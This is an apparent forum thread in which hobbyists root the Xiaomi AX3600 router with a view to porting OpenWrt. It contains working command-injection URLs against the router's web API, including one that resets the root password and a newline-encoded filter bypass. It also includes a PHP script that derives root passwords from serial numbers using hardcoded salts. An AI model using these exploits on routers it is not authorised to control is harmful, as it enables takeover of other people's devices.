It's easy to get the ssh access. But it speed me much time to change the root password. Finally, i managed to change by using ld excute https://askubuntu.com/questions/354342/how-can-i-execute-a-file-without-execute-permissions
Ok, with ssh access now possible, and more and more folks seemingly interested, I am getting in on this early. I've been hunting around on Aliexpress, I can get 2x shipped via UPS Express Saver (7-10 days) for ~US$256. This will give me one for work and one for play. If anybody can point me to where it is cheaper, happy to know. BTW, there is clearly a serial header on board and the pinout is even silk-screened on:
https://www.acwifi.net/wp-content/uploads/2020/03/SAM_6424.jpg
1 Like
Hello,
Where can one see the algorithm from which I can derive the root password?
Hi
You can use the following code to change the root password to "admin"
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
4 Likes
Thanks,
But I am also interested in the algorithm they used to create the root password based on device SN. If you can point me in the right direction.
#!/usr/bin/env php
<?php
$salt = array(
'r1d' => 'A2E371B0-B34B-48A5-8C40-A7133F3B5D88',
'others' => 'd44fb0960aa0-a5e6-4a30-250f-6d2df50a'
);
isset($argv[1]) or die('Usage: ' . $argv[0] . " SN\n");
print_line(get_passwd($argv[1]));
function print_line($message) {
echo $message . "\n";
}
function get_passwd($sn) {
return substr(md5($sn . get_salt($sn)), 0, 8);
}
function get_salt($sn) {
global $salt;
if (false === strpos($sn, '/')) {
return $salt['r1d'];
} else {
return swap_salt($salt['others']);
}
}
function swap_salt($salt) {
return implode('-', array_reverse(explode('-', $salt)));
}
link:https://blog.csdn.net/zhoujiazhao/article/details/102578244
use it like this:pi@DESKTOP-55HOBQT:/mnt/c/Users/someone/Desktop$ php a.php 10508/00771881
4 Likes
Thanks mate,
I appreciate it!
Is there anyway to help get openwrt to AX3600?
I may be able to handle programming, but I have no idea on how devices/kernels/drivers etc work and where I should start, how to test etc.
I am also in 
2 Likes
teardown
complete ttl contact
connect
copy boot log
1 Like
secure boot fuse is not enabled 
5 Likes
Perhaps a dumb question, but I'm in the market for a new router/ap. I don't trust Xiaomi enough to make it my main device if I can't put OpenWRT on it. I am however, willing to run it temporarily behind my current router and block all traffic in their direction, until I can actually do so.
Does this finding mean that an OpenWRT build has a good chance of happening in the next 6-12months?
Thanks!
It is way too early to answer this question, a lot can still go wrong and I haven't seen anyone even started working on a port for it. While chances aren't too bad, you won't know until someone at least submits a first approach as a pull request (even that won't give you any guarantees, until the patch set has actually been merged, but it would at least show you what would be possible - right now, it's still a va banque game).
1 Like
LonGDikE,
Thanks for the tips to lead to getting SSH. On the unit I just received and downgraded to 1.0.17 - none of your commands as written worked. This appears to be due to the fact that this firmware performs some auto-filtering of characters that could lead to escape. Specifically ; & $ appear to not be permitted. After searching around a bit I came across this article:
In there it details that you can use newlines (%0A) [percent zero capital-A] instead of semicolons with some Xiaomi routers. With that, I was able to confirm escape via the following URL:
http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0Areboot%0A
Which, happily, rebooted the router. From there I was able to enable nvram SSH and then deleted the IF in /etc/init.d/dropbear by piping the dropbear contents to sed '135d' three times (which deleted the IF, the return 0, and the FI to stop the init file from keeping SSH off). I then used your command to change admin password, however, there is a password length requirement (8 characters seemed to do the trick).
I have confirmed that the %0Areboot%0A does not work on the 1.0.50 firmware (which is the latest as of this post).
Let me know if anyone would like more specifics or details. Happy to help to bring OpenWRT to this puppy.
You can take a look here: Xiaomi AX3600 DTS
Someone is already trying to gather the necessary information (slh and efsg).
I gave the AX3600 to zhiping, soon...
1 Like
esfg,
As you have serial port access, do you need anything from a persistent SSH perspective?
I do not know...
(MiWiFi/HiWiFi)Xiaomi can block at any time
Correct - the exploit I leveraged only works via downgrading to 1.0.17. As of 1.0.50 - it cannot be used as the method has been patched.
Yes, but we could still use 1.0.17 as a vector to get in the router and flash openwrt. Even as an install instruction it shouldn't be something difficult to do(as long as Xiaomi doesn't release firmwares that blocks downgrade-ing to 1.0.17).
What we need now is a openwrt build for this device, right?